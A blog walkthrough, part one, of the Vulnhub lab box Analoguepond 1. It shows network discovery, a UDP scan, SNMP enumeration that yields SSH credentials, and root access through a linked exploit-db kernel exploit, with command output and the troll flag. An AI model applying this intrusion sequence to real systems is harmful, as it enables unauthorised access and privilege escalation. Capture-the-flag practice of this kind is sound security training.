In this post I want to start with a walkthrough of the Vulnhub challenge Analoguepond 1. Since I have not finished this box yet, I will split this walkthrough into several parts. This here is the first part. So lets start.
The first thing I usually do when I start such a challenge is to scan the network in order to find out on which IP address I can find the box. In order to do so I usually use
root@kali:# netdiscover -r 192.168.56.0/24 -i eth1 Currently scanning: Finished! | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 **:**:**:**:**:** 1 60 Unknown vendor 192.168.56.100 **:**:**:**:**:** 1 60 PCS Systemtechnik GmbH 192.168.56.101 **:**:**:**:**:** 1 60 PCS Systemtechnik GmbH
As you can see, the IP address of the box is 192.168.56.101. So lets do a portscan over it to determine the open ports. At this point, you should keep in mind the hint at the description which says “Remember TCP is not the only protocol on the Internet”. This led me to do a complete portscan (i.e. inclusively UDP). This took quiet a while, but finally gave me this
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) 68/udp open|filtered dhcpc 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
The interesting ports are
snmp. I assume that the
snmp is the protocol that was pointed to in the hint. I first tried to log in over ssh with some easy passwords, but there was no luck. So I connected to the port 161 to find out whats hidden there. I used the tool
snmp-check to do a first check.
root@kali:# snmp-check 192.168.56.101 snmp-check v1.9 - SNMP enumerator Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org) [+] Try to connect to 192.168.56.101:161 using SNMPv1 and community 'public' [*] System information: Host IP address : 192.168.56.101 Hostname : analoguepond Description : Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 Contact : Eric Burdon <email@example.com> Location : There is a house in New Orleans they call it... Uptime snmp : 00:14:28.61 Uptime system : 00:14:12.85 System date : 2017-4-29 21:32:41.0
Cool, there is already a name, Eric! This might be a username. The second interesting thing is the location. Searching the string on Google immediately resulted in articles about a song from The Animals which is called ‘The House of the Rising Sun’. So the answer is probably therisingsun which could be a password. I have also tried some other things on that
snmp port, but I had no luck. Therefore I tried to login on the
ssh port with the gained username an (hopefully) password. And indeed it worked 😀
In eric’s home folder was not much to find. Some common files like the
.bash-history (it has been deleted), but also an image called
reticulatingsplines.gif which relates to SimCity. However, I could not yet figure out what this image has to do with the whole box. In a next step, I looked through the usual places where something useful could be hidden, like the
/etc/passwd file and a bunch of other stuff. Eventually I checked the OS and I found out something interesting
eric@analoguepond:~$ uname -a Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
The kernel version seems really outdated. Maybe there is a vulnerability on the kernel which allows us to escalate the privileges. After some time googling I found this: https://www.exploit-db.com/exploits/39166/. I compiled it locally on my Kali machine and then uploaded it to the box. Run it there and boom, we have a root shell 😀
So lets go to the
eric@analoguepond:/tmp$ ./exploit root@analoguepond:/tmp# whoami root root@analoguepond:/tmp# cd /root root@analoguepond:/root# ls -al total 24 drwx------ 3 root root 4096 Apr 26 20:51 . drwxr-xr-x 22 root root 4096 Jan 7 18:42 .. -rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc -rw------- 1 root root 237 Dec 17 09:38 flag.txt -rw-r--r-- 1 root root 140 Feb 20 2014 .profile drwx------ 2 root root 4096 Apr 26 20:51 .ssh root@analoguepond:/root# cat flag.txt C'Mon Man! Y'all didn't think this was the final flag so soon...? Did the bright lights and big city knock you out...? If you pull a stunt like this again, I'll send you back to Walker... This is obviously troll flah #1 So keep going. root@analoguepond:/root#
and cool I found the troll flag that was also mentioned in the description.
With root privileges on the box and the first (troll) flag I want to finish the first part of this walkthrough. As always, if you have any questions about the steps I have done or if you have just some comments or tips, please do not hesitate and write a comment or write me directly. Please stay tuned for the second part.